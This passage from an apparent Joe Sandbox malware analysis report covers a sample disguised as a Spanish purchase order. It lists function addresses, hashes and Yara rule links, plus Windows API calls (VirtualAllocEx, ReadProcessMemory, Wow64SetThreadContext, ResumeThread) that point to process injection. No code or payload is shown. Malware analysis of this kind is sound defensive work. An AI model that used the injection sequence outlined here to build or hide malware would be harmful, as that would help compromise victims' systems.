Instruction ID: 08e375f8431203d4c9652a0ba3d37386dede75c565b7cffd0f748974d221f17c
Opcode Fuzzy Hash: d733b34583264eb0dc79a5db73e964b3b140a5a08ff49496ac72216cabdc8321
Instruction Fuzzy Hash: AE4158B9D042589FCB10CFA9D984ADEFBB5BB19310F10906AE914B7310D335A945CF65

Function 02F20598 Relevance: 1.6, APIs: 1, Instructions: 100
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02F20645

Memory Dump Source

Source File: 00000000.00000002.2115270777.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f20000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 17c75244568750e08f6ebebc36a0a75989f007cbb50b7604b6dc3588f7154014
Instruction ID: f9e55beeb9177cd52fe6b737d51be6554418e8f5aa2f822d74b5d034cad37071
Opcode Fuzzy Hash: 17c75244568750e08f6ebebc36a0a75989f007cbb50b7604b6dc3588f7154014
Instruction Fuzzy Hash: 0D3158B9D042589FCF10CFA9D984ADEFBB5BB59310F10901AE918B7310D335A946CF65

Function 02F20488 Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02F20535

Memory Dump Source

Source File: 00000000.00000002.2115270777.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f20000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 04c891a9b2532e77279e1da85146f7526d436d20ed4db52008b3aa26b3798132
Instruction ID: ca8020089079d40b226591fa0bae2938b2a12948ab5018d8b318c839e29fdfa8
Opcode Fuzzy Hash: 04c891a9b2532e77279e1da85146f7526d436d20ed4db52008b3aa26b3798132
Instruction Fuzzy Hash: FF3167B9D042589FCF10CFAAD984ADEFBB5BB19310F10906AE914B7310D335A945CF65

Function 02F205A0 Relevance: 1.6, APIs: 1, Instructions: 95
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02F20645

Memory Dump Source

Source File: 00000000.00000002.2115270777.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f20000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b45a485809535bafdcd75b04e813770947dc776e16b2e744aeff644eb1b4a9fb
Instruction ID: b6577e456ba843f57c8625fa5a7c42aa170d5b5328b122c66fc33354b6b7c0b3
Opcode Fuzzy Hash: b45a485809535bafdcd75b04e813770947dc776e16b2e744aeff644eb1b4a9fb
Instruction Fuzzy Hash: 173157B9D04258DFCF10CFA9D984A9EFBB5BB59310F10A02AE918B7310D335A945CF65

Function 02F20370 Relevance: 1.6, APIs: 1, Instructions: 89
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 02F20422

Memory Dump Source

Source File: 00000000.00000002.2115270777.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f20000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 3956abf182801ab0714867c53898d8310f03b4109159859894981a60c9031807
Instruction ID: 76ba207eb22fe61b5d3c175970bca838489c2b8effd2bd51f1118cd7f5f869d2
Opcode Fuzzy Hash: 3956abf182801ab0714867c53898d8310f03b4109159859894981a60c9031807
Instruction Fuzzy Hash: DA31CAB5D042589FCB10CFAAD584ADEFBF1BF49314F24802AE518B7240C378A949CF64

Function 02F20378 Relevance: 1.6, APIs: 1, Instructions: 88
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 02F20422

Memory Dump Source

Source File: 00000000.00000002.2115270777.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f20000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 5798a8e701fe8a18076354f478a6f430c9c012dc692cb514b015cacbe783e5d4
Instruction ID: a525cab5d55337f712f1582aeb3eb29a30ee97f33c8f02e84d1694f373b51cd5
Opcode Fuzzy Hash: 5798a8e701fe8a18076354f478a6f430c9c012dc692cb514b015cacbe783e5d4
Instruction Fuzzy Hash: 8A31AAB5D012589FCB10CFAAD584ADEFBF1BB49314F24902AE518B7250C378A949CF64

Function 02F207E0 Relevance: 1.6, APIs: 1, Instructions: 68
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 02F2085E

Memory Dump Source

Source File: 00000000.00000002.2115270777.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f20000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 29a37337e074653d77ed436b3ea834e3202bb4e7fb53f1061710c8d0d243bd41
Instruction ID: 9568993e73123cb0b65b61bd0c04d26e16489f7ac7e0c67f2eaee495d452e262
Opcode Fuzzy Hash: 29a37337e074653d77ed436b3ea834e3202bb4e7fb53f1061710c8d0d243bd41
Instruction Fuzzy Hash: DA21ACB5D002189FCB10CFA9D484ADEFBF4EB09310F14905AE918B3310D335A945CFA5

Function 02F207E8 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE(?), ref: 02F2085E

Memory Dump Source

Source File: 00000000.00000002.2115270777.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f20000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 00943184d497ff0c6eaf807698f41535bfc66af53c2091140eb13a7229b103f4
Instruction ID: 33f3450af583f1f42df0427b596b05266e88c283c4274d648a8d65148d642eb7
Opcode Fuzzy Hash: 00943184d497ff0c6eaf807698f41535bfc66af53c2091140eb13a7229b103f4
Instruction Fuzzy Hash: 342186B9D002189FCB10CFA9D584ADEFBF4AB09324F24906AE918B7310D335A945CFA5

Function 014DCF48 Relevance: 1.3, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

TJbq, xrefs: 014DCF9B

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID: TJbq
API String ID: 0-1760495472
Opcode ID: e13a8e37a30da8ef784b4f78125f2f28bb0a2bf61efeecce06f8784f271c3f65
Instruction ID: 626bd64d60ce4850813d8da0be5602f883358ce5cad81d9065c986e0d8b6135c
Opcode Fuzzy Hash: e13a8e37a30da8ef784b4f78125f2f28bb0a2bf61efeecce06f8784f271c3f65
Instruction Fuzzy Hash: 5311EC70E4420A9FCF44DFB9D5A15EEBBF5BF49200F1085AED519A32A4DB309A41CB90

Function 014D4945 Relevance: 1.3, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

", xrefs: 014D7980

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 3f8efc012c13c321d2e06c8343681e503750cd64f68b36371239dc18b19fa1f9
Instruction ID: a970caf09edf13203c7cfc7323381f4a563c5966497046c7fb0a0e7e201dc202
Opcode Fuzzy Hash: 3f8efc012c13c321d2e06c8343681e503750cd64f68b36371239dc18b19fa1f9
Instruction Fuzzy Hash: 4A014C74906229CFDF20CF18D854BF8BBB4FB4A305F0150EAC81EA3612D7341A858F11

Function 014D27D1 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20e107847eb7c63774ae67d3c327449e70a3cc9abf9c1a86dc79d35b605a4d5e
Instruction ID: 0fa2f40f7c2dab01e830bb268be17ed56fc5be5bb8d8abf475bb46345ff270a7
Opcode Fuzzy Hash: 20e107847eb7c63774ae67d3c327449e70a3cc9abf9c1a86dc79d35b605a4d5e
Instruction Fuzzy Hash: 2C513474E05209CFDF00DFA9D865AEEBBF5FF89300F00916AE805A7261D7B09902CB51

Function 014D27E0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db02707eb4c3273a3033a047097667edc495359a6829ee82f1a0674b2ae1d034
Instruction ID: 5df20d51bd3aa17758b53a1fa402f2edfda3fd01cfb408a21a055fcb840be12d
Opcode Fuzzy Hash: db02707eb4c3273a3033a047097667edc495359a6829ee82f1a0674b2ae1d034
Instruction Fuzzy Hash: 5F411374E05209CFDF04DFA9D855AAEBBF9FF89300F10A16AE815A7361D7B09902CB51

Function 014DE008 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b31be8e09a06b9984c28dd7afe434668c5e20b3c4fe2508e2c2c014f33860d85
Instruction ID: 1ba8512b06b04dd60b889f3062ec55e495acc3b8d1994aeaa983c162fe55bd4d
Opcode Fuzzy Hash: b31be8e09a06b9984c28dd7afe434668c5e20b3c4fe2508e2c2c014f33860d85
Instruction Fuzzy Hash: 1D4117B4E04209DFDF00DFA9E954AEEBBB5AF49300F04902AE415BB361DB349941CF51

Function 014D0A50 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f29874d2be680b76c83f055971b1649601de90553126fccfbaf000dd1341d51
Instruction ID: e28d951f9463973bcce6f50583ad1382844b9c91a548fe9ba8717f6ba046ce20
Opcode Fuzzy Hash: 8f29874d2be680b76c83f055971b1649601de90553126fccfbaf000dd1341d51
Instruction Fuzzy Hash: 534138B4E042099FDF04DFA9D4649EEBBF6EF99304F108566E405A7361DB309902CF62

Function 014D2270 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 932ba0fa8654d371041567c6aa9938813ffc5352c3d2ae8a865beacdb2062c32
Instruction ID: e975ac9dd57c1c0a2d7a471e2d1b177d6fd220fc8a5b3ff7a2d59b506141838e
Opcode Fuzzy Hash: 932ba0fa8654d371041567c6aa9938813ffc5352c3d2ae8a865beacdb2062c32
Instruction Fuzzy Hash: F141D078D043088BDB28DFB1E99899EBFB2FB8A301F20D16AD849A7354DB350845CF55

Function 014D0E58 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8be1ec933337c1c3fcc175bd9a2a994f6bed758937b58d8c525c3ab756bd46c
Instruction ID: e0326f46ef3bf4fb96a1d7af6b99cec1518909b8e5aa86244efc468f62b2a1ca
Opcode Fuzzy Hash: c8be1ec933337c1c3fcc175bd9a2a994f6bed758937b58d8c525c3ab756bd46c
Instruction Fuzzy Hash: AD412574E09209CFCF14DFAAE4A49EEBBB6AF89311F14906AE415B7360DB305802CF50

Function 014D0E68 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 635084a14751b6b8e15ab29717cf14487690074dab3d1eb9090414d3fe700da7
Instruction ID: a26b0542da677f33153795cc5ddf3f237d52dfb2b7f32a9650dda94f9acc977f
Opcode Fuzzy Hash: 635084a14751b6b8e15ab29717cf14487690074dab3d1eb9090414d3fe700da7
Instruction Fuzzy Hash: 1E41E279E05209CBCF14DFAAE454AEEBBB6AF89311F14902AE415A7360DB305942CB50

Function 014D0A60 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54584391c0fad5c1e11124e3243a78b666aa9e57ee897a283714a59076c010c9
Instruction ID: b55d2adbfe0fc50dbafbadef23320460b056425aa3b1377cd12125b3bebce943
Opcode Fuzzy Hash: 54584391c0fad5c1e11124e3243a78b666aa9e57ee897a283714a59076c010c9
Instruction Fuzzy Hash: 0C410874E052099FDF04DFA9D464AAEBBF6AF99304F10916AE409A7361DB309901CF62

Function 014D2280 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 753c3755036f406148dc7ccdb1b7b5ae37a78eb555545b8d948d6ef089d7d6ff
Instruction ID: cfc52e32944a4bcfe76c2af00b2d9353fc38a03eb5382c74aa056ddb5ae7edd1
Opcode Fuzzy Hash: 753c3755036f406148dc7ccdb1b7b5ae37a78eb555545b8d948d6ef089d7d6ff
Instruction Fuzzy Hash: EE41B078D003188BDB28DFB5E95899EBFB2FB8A301F60D129D849A7354DB351845CF45

Function 014DDCC8 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3564faddd64fa8bc11b7f7bc8412255ab9bee35fb7767c9f579f6911ce688b3
Instruction ID: a2e1b661903d126bae66db0c81be98e03b5228109df54e427084fcdfb41fe9bb
Opcode Fuzzy Hash: e3564faddd64fa8bc11b7f7bc8412255ab9bee35fb7767c9f579f6911ce688b3
Instruction Fuzzy Hash: E631F278D002099BCF18EFB0E4508EEBBB2EF6A301B50646ED95577394DB365906CB91

Function 014D0C30 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d43193c2de2aaa1d6b47e453a4baa83733244315ff74493e18a89dbc74feb7f
Instruction ID: 8205d64e09435bc78732c195a340a93808b5b33d85e34e3f7be8439a3a5c83ce
Opcode Fuzzy Hash: 6d43193c2de2aaa1d6b47e453a4baa83733244315ff74493e18a89dbc74feb7f
Instruction Fuzzy Hash: FD31DE78E05208DBDF18DFA9E558AEEBBF5FB89301F10906AE415A3360DB305906CF64

Function 014D161B Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b4538849b68dda135c90e2bdad39f26cd0b765f4f2ad185ca954c9f3fb175b0
Instruction ID: 4b987981cad02e45a0aa35bf88ae64a919716c3aa42dc1d72c8e6264c40079de
Opcode Fuzzy Hash: 3b4538849b68dda135c90e2bdad39f26cd0b765f4f2ad185ca954c9f3fb175b0
Instruction Fuzzy Hash: 2321DA38A45218CFEF20DF94D598BACB7B5BB09711F14509AE90AA7762C7749E86CF00

Function 014D22F0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cf5e89678cb72ea3142959793833febaf363dfcfe8598d2a66c92d9b9bdcfd8
Instruction ID: 2600dd03f9c1c2207971493ccf42b90052dc579e2a1c29f597170251385bee08
Opcode Fuzzy Hash: 2cf5e89678cb72ea3142959793833febaf363dfcfe8598d2a66c92d9b9bdcfd8
Instruction Fuzzy Hash: 2821C678A01208CFDB14DFA4E958AADBBB6FF49300F1484AAD909A3364CB755D91CF51

Function 014D1200 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aec3216884c9f1011fbfb939e95448523edb9b622acd1ae256782bb76a6da56
Instruction ID: 017bf062dd616066e87a2697af8403f8171b011b65d535d9db8edafa9db1cde4
Opcode Fuzzy Hash: 4aec3216884c9f1011fbfb939e95448523edb9b622acd1ae256782bb76a6da56
Instruction Fuzzy Hash: 741170B1D491048BDF54DB69D8656EEBBB9AB8D700F14902BD805F3261DB720841CBA5

Function 014D0C20 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17bb85ae2e6a9df35ba1329fb29ab6c27f755f86c7977c7bd0980790820281d3
Instruction ID: 3bb9d252d4d2f8dfc5bb94fa41deceedc4b5aa3f5917c0c53c7085e17398fca3
Opcode Fuzzy Hash: 17bb85ae2e6a9df35ba1329fb29ab6c27f755f86c7977c7bd0980790820281d3
Instruction Fuzzy Hash: DB21FF78E05248DFCF18CFB9E5849EDBBF1EF8A300F00906AE814A7221D73099068B04

Function 014D0839 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 637663c28e98e39f8f622a5507f7721d7d6aa145a87851c4ad899b698ae8fa98
Instruction ID: 9f77c9822841488e8a2ab53367ced497b30731954e536dc9c085436fced3305f
Opcode Fuzzy Hash: 637663c28e98e39f8f622a5507f7721d7d6aa145a87851c4ad899b698ae8fa98
Instruction Fuzzy Hash: 66015E34D19204DFCB24EFBAA51A2ADBBF8EF8A201F009496F459D3226E7344511CB81

Function 014D23C7 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34442c3dfbb63f83cc17fd497c06d9ed4bdfe075f56fd44dea68431f28c389eb
Instruction ID: 61734d8e5489029439779e2e4e45ed60f33ad7e2455f8b2e08184d0c9508f2aa
Opcode Fuzzy Hash: 34442c3dfbb63f83cc17fd497c06d9ed4bdfe075f56fd44dea68431f28c389eb
Instruction Fuzzy Hash: 52219478E04318CFCB60CF64D958BAEBBB1FF4A301F0094AAD549A3254DB700A85CF16

Function 014D1210 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d0578b5db9df91a365609a409adf6ad8d6f2be9ea65ffa6bd61e19dd59145d9
Instruction ID: f14a64c23c8159184322f7c86b2a26acae7b423f9c73bd5e4cf4bff9cc67f371
Opcode Fuzzy Hash: 9d0578b5db9df91a365609a409adf6ad8d6f2be9ea65ffa6bd61e19dd59145d9
Instruction Fuzzy Hash: 2A0140B5D491088FDF44DFA9D964AEEBBF9AB8DB00F14902BD805F3264CB720841CB64

Function 014D0848 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e400cce202f58f336629b8485feae2157cf5ecfd09a3d8885ae03548f31c529c
Instruction ID: b1bbf8dd406956ce99c87d5f66da46d7693f7d2a226936681004e83e1ebda186
Opcode Fuzzy Hash: e400cce202f58f336629b8485feae2157cf5ecfd09a3d8885ae03548f31c529c
Instruction Fuzzy Hash: 53011734D09204DFCF14EFBAA5596ADBBF8AF4D301F009456F459D3215D73045418B80

Function 014D1370 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2192358ecafd404887c6b31a2d221b262dbdb974b8ced8cf3ee12ca727afede
Instruction ID: fd0b45f326f0ffcc8e5d0d34a51dbeb519d39120c529e9113982afec22bd3edd
Opcode Fuzzy Hash: b2192358ecafd404887c6b31a2d221b262dbdb974b8ced8cf3ee12ca727afede
Instruction Fuzzy Hash: 86019378A09654CFCB54CF28C9A8E997BB4BF4E711F1551DAE80AAB362C731AD40CF00

Function 014DE3A0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82565371c9419176d736991cad59ca884db852ec60f478733e6b03c2fa626300
Instruction ID: ade58ab505edc4065f3244df17dd136c6284d73ad6b7b922b3a07671f01170af
Opcode Fuzzy Hash: 82565371c9419176d736991cad59ca884db852ec60f478733e6b03c2fa626300
Instruction Fuzzy Hash: 06011274D04209EFDB40EFA8D800BBEBBB5BB09300F60916AD904BB350DB319A10DB90

Function 014D246C Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 335528c6e6b242ee727034b60876969d5c98bbb4b607040b356ab8ad7a632ed3
Instruction ID: 908bae414f68c07508f4ee5e41a5cf04b1ead95996240869bacff8bf9a3faf3c
Opcode Fuzzy Hash: 335528c6e6b242ee727034b60876969d5c98bbb4b607040b356ab8ad7a632ed3
Instruction Fuzzy Hash: 97119E78D08229CFCF60CF64E998BADBBB5BB0A304F0054AAE41DA3351D7B15A85CF05

Function 014D1178 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d48cf6ff29a0ebb666d9ea326b1d8c2849e82b70bf9d727a5f053e3a0cb73c59
Instruction ID: be82b4965828751bef6d5c136cde69fd728a1a355785ce2bcdc89c7f48acb48c
Opcode Fuzzy Hash: d48cf6ff29a0ebb666d9ea326b1d8c2849e82b70bf9d727a5f053e3a0cb73c59
Instruction Fuzzy Hash: 20F09035E051188BCF04DFA9E814ADDBBB9EB8D711F006127D50173310DB311C15CBA0

Function 014D0E11 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10dcfa307f1e26b447f06904099ee39c6a9d491791853c3e510fc9f4f871c1fc
Instruction ID: a2007757930f658d1b8ffb2ebae72ffa146938b631ee01c2ea8402fd4ef98ff1
Opcode Fuzzy Hash: 10dcfa307f1e26b447f06904099ee39c6a9d491791853c3e510fc9f4f871c1fc
Instruction Fuzzy Hash: 7CF06D70D14248AFCB40EFA8D4986DDBFF0EB45301F0089E6D848A3211D7345A42DB41

Function 014D0DC9 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2115141518.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14d0000_rPedidodecompra__PO20441__ARIMComponentes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69a7a3d80f50432bb41739957bfad2a178b12ee5c3562db20713b158af6fa71b
Instruction ID: cb0a8220d7d86c3e2ea4c74ed234b582b0d64edd136e4723f4d66fdf1e91fcc3
Opcode Fuzzy Hash: 69a7a3d80f50432bb41739957bfad2a178b12ee5c3562db20713b158af6fa71b
